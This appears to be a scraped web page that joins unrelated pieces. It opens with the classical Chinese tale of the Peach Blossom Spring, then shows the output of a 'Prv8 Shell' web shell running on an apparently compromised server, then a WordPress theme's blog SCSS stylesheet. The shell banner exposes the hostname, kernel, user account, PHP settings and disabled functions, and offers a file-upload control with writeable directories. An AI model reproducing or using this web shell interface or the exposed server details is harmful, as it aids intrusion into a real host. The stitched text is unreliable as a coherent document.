晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/tabatabaei/.trash/wp-content.1/themes/scapeshot/sass/site/section/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //home/tabatabaei/.trash/wp-content.1/themes/scapeshot/sass/site/section/_blog.scss
.section,
.home .archive-post-wrap .hentry,
.recent-blog-content .archive-post-wrap .hentry {
    min-height: 100vh;
    display: flex;
    align-items: center;
    background-repeat: no-repeat;
    background-position: center;
    background-size: cover;
    margin-bottom: 0;
}

body.color-scheme-ecommerce .section {
    display: block;
    min-height: unset;
}

body.color-scheme-ecommerce .section + .site-content {
    border-top: 1px solid;
}

.admin-bar .section,
.admin-bar.home .archive-post-wrap .hentry,
.admin-bar .recent-blog-content .archive-post-wrap .hentry,
.admin-bar #feature-slider-section .hentry-inner,
.admin-bar.home .header-media,
.admin-bar.has-header-image.home .custom-header-media {
    min-height: calc( 100vh - 46px );
}

.color-scheme-wedding .section,
.color-scheme-wedding.admin-bar .section {
    min-height: unset;
}

.home .archive-post-wrap .hentry:before,
.recent-blog-content .archive-post-wrap .hentry:before {
    background-color: rgba(0,0,0,0.4);
}

.home .archive-post-wrap .hentry:before,
.recent-blog-content .archive-post-wrap .hentry:before,
#feature-slider-section .post-thumbnail:before  {
    content: "";
    position: absolute;
    top: 0;
    left: 0;
    right: 0;
    width: 100%;
    height: 100%;
   /* z-index: 1;*/
}

#feature-slider-section .post-thumbnail:before {
    background-color: rgba(0,0,0,0.2);
}

.promotion-section.section .wrapper,
.app-section.section .wrapper,
.recent-blog-content.section .wrapper {
    z-index: 0;
}

.section .wrapper,
.home .archive-post-wrap .post-wrapper,
.recent-blog-content .archive-post-wrap .post-wrapper {
    z-index: 2;
}

.home .archive-post-wrap .hentry:nth-child(even) .entry-container,
.recent-blog-content .archive-post-wrap .hentry:nth-child(even) .entry-container {
    float: right;
}

.home .archive-post-wrap .post-wrapper .entry-container,
.recent-blog-content .archive-post-wrap .post-wrapper .entry-container {
    max-width: 700px;
    padding: 30px;
}

.archive-content-wrap .section-content-wrapper.layout-one .hentry,
.archive .archive-content-wrap .section-content-wrapper .hentry {
    margin-bottom: 35px;

    @include media(tablet) {
        margin-bottom: 70px;
    }

    @include media(wide) {
        margin-bottom: 105px;
    }

    .entry-header {
        margin-bottom: 14px;

        @include media(desktop){
            margin-bottom: 28px;
        }

        .entry-title {
            font-size: 24px;
            font-size: 1.5rem;
            font-weight: 400;
            margin-bottom: 0;
            margin-top: 0;

            @include media(desktop){
                font-size: 35px;
                font-size: 2.1875rem;
            }
        }
    }

    .post-thumbnail {
        margin-bottom: 21px;

        @include media(desktop) {
            margin-bottom: 28px;
        }

        @include media(wide) {
            margin-bottom: 42px;
        }
    }
}

.singular-content-wrap {

    .more-button {
        margin-top: 21px;
        padding: 0;

        &:hover,
        &:focus {
            box-shadow: none;
            -webkit-box-shadow: none;
        }
    }
}

.archive-content-wrap .section-content-wrapper.layout-one {

    .entry-container {
        text-align: left;

        > .entry-meta {
            border-right: 1px solid;
            float: left;
            font-weight: 600;
            letter-spacing: 2px;
            line-height: 2.92;
            margin-right: 17px;
            padding-right: 11px;
            text-align: center;

            @include media(desktop) {
                margin-right: 27px;
                padding-right: 27px;
            }

            .posted-on {
                margin-right: 0;

                .date-day {
                    display: block;
                    font-size: 50px;
                    font-size: 3.125rem;
                    font-weight: 400;
                    line-height: 0.6;
                    margin-bottom: 10px;

                    @include media(desktop) {
                        font-size: 70px;
                        font-size: 4.375rem;
                        margin-bottom: 20px;
                    }
                }

                a:before {
                    display: none;
                }
            }
        }
    }

    .entry-header-wrapper {
        overflow: hidden;

        .entry-meta {
            margin: 0;
        }
    }
}

.archive-content-wrap {

    .section-content-wrapper {

        .hentry {

            &:last-child {
                margin-bottom: 35px;

                @include media(desktop) {
                    margin-bottom: 38px;
                }

                @include media(wide) {
                    margin-bottom: 42px;
                }
            }

            .entry-header {
                margin-bottom: 21px;

                @include media(desktop){
                    margin-bottom: 28px;
                }

                .entry-title {
                    font-size: 24px;
                    font-size: 1.5rem;
                    font-weight: 400;
                    margin-bottom: 0;
                    margin-top: 0;

                    @include media(desktop){
                        font-size: 36px;
                        font-size: 2.25rem;
                    }
                }
            }

            .entry-meta {
                margin: 0;
                font-weight: 600;

                .posted-on {
                    margin-right: 0;
                }

                .cat-links {
                    letter-spacing: 2px;
                    text-transform: uppercase;
                }
            }

            .vcard {
                font-weight: 600;
            }

            .entry-summary {
                margin-top: 0;
            }

            .post-thumbnail {

                &:hover {

                    img {
                        transform: scale(1) translateX(0);
                        -o-transform: scale(1) translateX(0);
                        -moz-transform: scale(1) translateX(0);
                        -webkit-transform: scale(1) translateX(0);
                    }
                }
            }
        }
    }

    .entry-footer:first-child {
        margin-top: 0;
    }
}

.archive-content-wrap {

    .post-thumbnail {
        overflow: hidden;

        img {
            transform: scale(1.1);
            -o-transform: scale(1.1);
            -moz-transform: scale(1.1);
            -webkit-transform: scale(1.1);
            width: 100%;
        }
    }
}

.archive-content-wrap {

    .section-content-wrapper.layout-four {
        @include flex;
        align-items: unset;
        justify-content: unset;
    }
}

.archive-content-wrap  .entry-content {
    margin-top: 21px;

    @include media(desktop) {
        margin-top: 35px;
    }
}

.page-header {
    text-align: center;
}

.singular-content-wrap .entry-header .entry-meta {
    text-align: center;
}

.section:nth-child(2n+1) + .site-content {
    border-top: 0;
}

.site-main nav.post-navigation {
    border-width: 1px;
    border-left-width: 0;
    border-right-width: 0;
    border-top-width: 0;
    border-style: solid;
    margin-bottom: 0;
    padding-bottom: 35px;
    position: relative;

    @include media(desktop) {
        padding-bottom: 42px;
    }

    @include media(diagonal) {
        padding-bottom: 49px;
    }

    @include media(ultra-wide) {
        padding-bottom: 56px;
    }
}

.archive-content-wrap nav.navigation.posts-navigation {
    padding-top: 35px;

    .nav-next {
        text-align: right;
    }
}

.singular-content-wrap {

    .section-title {
        font-size: 24px;
        font-size: 1.5rem;
    }
}

.archive .archive-post-wrap .hentry,
.search .archive-post-wrap .hentry,
.blog:not(.home) .archive-post-wrap .hentry {
    margin-bottom: 0;
}

.archive .archive-post-wrap .post-wrapper,
.search .archive-post-wrap .post-wrapper,
.blog:not(.home) .archive-post-wrap .post-wrapper {
    border-bottom: 1px solid;
    margin-bottom: 35px;
    padding-bottom: 35px;
}

haha - 2025